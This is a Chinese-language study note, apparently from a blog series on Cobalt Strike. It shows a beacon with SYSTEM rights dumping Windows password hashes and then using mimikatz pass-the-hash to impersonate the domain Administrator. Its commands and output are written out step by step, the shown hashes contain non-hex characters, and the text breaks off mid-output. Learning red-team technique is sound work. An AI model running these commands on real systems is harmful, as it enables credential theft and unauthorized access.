学习笔记】18、密码哈希散列设置信任"/>
【CS学习笔记】18、密码哈希散列设置信任
0x00 前言
继续上一节密码哈希的部分,在上一节中讲到了使用密码生成用户的令牌,从而取得系统的信任,这一节将介绍使用密码的哈希值来取得系统的信任。
0x01 密码哈希
首先使用 hashdump 获取用户的密码哈希值,这里的 beacon 会话为 SYSTEM 权限。
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
Administrator:500:aca3b435b5z404eeaad3f435b51404he:12cb161bvca930994x00cbc0aczf06d1:::
Daniel:1000:aca3b435b5z404eeaad3f435b51404he:12cb161bvca930994x00cbc0aczf06d1:::
Guest:501:aca3b435b5z404eeaad3f435b51404he:31d6cfe0d16ae931b73c59d7e0c089c0:::
TeamsSix:1002:aca3b435b5z404eeaad3f435b51404he:12cb161bvca930994x00cbc0aczf06d1:::
使用 pth 获取信任
beacon> pth TEAMSSIX\Administrator 12cb161bvca930994x00cbc0aczf06d1
[+] host called home, sent: 23 bytes
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:TEAMSSIX /ntlm:12cb161bvca930994x00cbc0aczf06d1 /run:"%COMSPEC% /c echo ade660d8dce > \\.\pipe\8d3e4c" command
[+] host called home, sent: 750600 bytes
[+] host 更多推荐
【CS学习笔记】18、密码哈希散列设置信任
发布评论